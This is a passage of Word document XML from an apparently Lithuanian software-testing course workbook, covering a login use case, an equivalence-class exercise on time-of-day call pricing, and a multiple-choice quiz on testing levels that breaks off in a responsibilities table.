          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Tikslas: perduoti sistemai vartotojo prisijungimo duomenis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003E55FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Ryšiai su kitais PA: iššaukiamas pradedant darbą su sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003E55FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieš-sąlygos: duomenų bazė veikia ir yra pasiekiama sistemos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003E55FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sužadinimo sąlyga: sistemos vartotojas paleidžia PĮ vykdomąją rinkmeną.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003E55FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Po-sąlyga: vartotojas autorizuotas ir įgavo teises naudotis sistemos paslaugomis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003E55FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pagrindinis scenarijus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003E55FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sistema paprašo įvesti vartotojo prisijungimo duomenis;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003E55FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Patikrinama, ar toks vartotojas egzistuoja duomenų bazėje ir suteikiamos atitinkamos teisės.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003E55FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Alternatyvūs scenarijai</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003E55FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Vartotojas įvedė neteisingus prisijungimo duomenis;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003E55FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Vartotojas nusprendė baigti darbą dar neprisijungus prie sistemos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BC7D82" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2b u</w:t>
      </w:r>
      <w:r w:rsidR="006E5ECA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>žduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006E5ECA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006E5ECA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Skambučių kaina priklauso nuo paros laiko. Jei skambinama po  8:00, tuomet pokalbio minutė kainuos 1 Eur. Jei skambinama po 13:00 val., pokalbio minutė kainuoja  1,5 Eur. Tarp 17:00 ir 23:00 kiekvienos pokalbio minutės kaina yra  2 Eur. Kitu metu pokalbiai nemokami.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006E5ECA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Nustatykite ekvivalentumo klases kiekvienai klasei.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006E5ECA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kokius klausimus ar prielaidas galime kelti spręsdami uždavinį?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009F77CA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Hlk14110534"/>
      <w:bookmarkStart w:id="120" w:name="_Hlk14110243"/>
      <w:bookmarkStart w:id="121" w:name="_Toc14392430"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kurti ir vykdyti skirtingų lygių ir tipų funkcinius testavimo atvejus.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002C28AD" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  TESTAVIMO LYGIAI: INTEGRATION, SYSTEM, ACCEPTANCE</w:t>
      </w:r>
      <w:r w:rsidR="00EF059E">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AB35A2" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Atsakykite į žemiau pateiktus klausimus. Kiekvie</w:t>
      </w:r>
      <w:r w:rsidR="005811B8" w:rsidRPr="00AD4464">
        <w:t>nas klausimas gali turėti vieną</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> arba d</w:t>
      </w:r>
      <w:r w:rsidR="005811B8" w:rsidRPr="00AD4464">
        <w:t>augiau teisingų atsakymų</w:t>
      </w:r>
      <w:r w:rsidR="00EF059E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005811B8" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00197D7B" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: Suprasti, </w:t>
      </w:r>
      <w:r w:rsidR="007A4C2C" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">kokie yra </w:t>
      </w:r>
      <w:r w:rsidR="00941AB7" w:rsidRPr="00AD4464">
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidR="007A4C2C" w:rsidRPr="00AD4464">
        <w:t>avimo lygiai</w:t>
      </w:r>
      <w:r w:rsidR="00197D7B" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007A4C2C" w:rsidRPr="00AD4464">
        <w:t>Geb</w:t>
      </w:r>
      <w:r w:rsidR="007A4C2C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ėti atskirti testavimo lygius bei testavimo veiklas, vykdomas atitinkamose lygiuose.</w:t>
      </w:r>
      <w:r w:rsidR="00197D7B" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000416A1" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kaip vadinamas testavimo lygmuo, kuriame testus k</w:t>
      </w:r>
      <w:r w:rsidR="00626735" w:rsidRPr="00AD4464">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ria dažniausiai tik programuotojai?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000416A1" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Komponentų testavimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000416A1" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Integracijų testavimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000416A1" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sistemos testavimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B8171F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Našumo testavimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B8171F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kurio lygmens testai dažniausiai yra skirti testuoti sąsajas tarp komponent</w:t>
      </w:r>
      <w:r w:rsidR="00626735" w:rsidRPr="00AD4464">
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> arba sistemų?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B8171F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Komponentų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B8171F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Integracijų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B8171F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sistemos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B8171F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Vartotojų priėmimo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00757663" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kuris iš žemiau pateiktų tikslų priskiriamas komponentų lygmens testavimui?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00757663" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Rasti komponentų defektus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00757663" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Nustatyti jei funkcinis ir nefunkcinis sistemos sąsajų darbas atitinka specifikaciją</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00757663" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Nustatyti jei funkcinis ir nefunkcinis sistemos darbas atitinka specifikaciją</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00570B8E" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Nustatyti </w:t>
      </w:r>
      <w:r w:rsidR="00757663" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> ar sistema yra išbaigta ir tinkamai funkcionuoja</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00757663" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t>Kokiame testavimo lygmenyje dažniausiai testuojame: vartotojo procedūras, konfigūracijas, forma</w:t>
      </w:r>
      <w:r w:rsidR="00465562" w:rsidRPr="00AD4464">
        <w:t>s ir</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> ataskaitas, verslo procesus?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00757663" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Komponentų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00757663" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Integracijų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00757663" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sistemos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00757663" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Vartotojų priėmimo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002C137E" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Kas yra dažniausiai atsakingas už testavimo vykdymą priklausomai nuo testavimo lygmens? Sužymėkite </w:t>
      </w:r>
      <w:r w:rsidR="006B25C2" w:rsidRPr="00AD4464">
        <w:t>“X” atitinkamuose langeliuose.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>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1701"/>
        <w:gridCol w:w="1843"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="1666"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidTr="00EB206D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2223" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atsakinga grupė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Komponentų testavimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Integracijos testavimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Sistemos testavimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Priėmimo testavimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidTr="00EB206D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2223" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Programuotojai</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
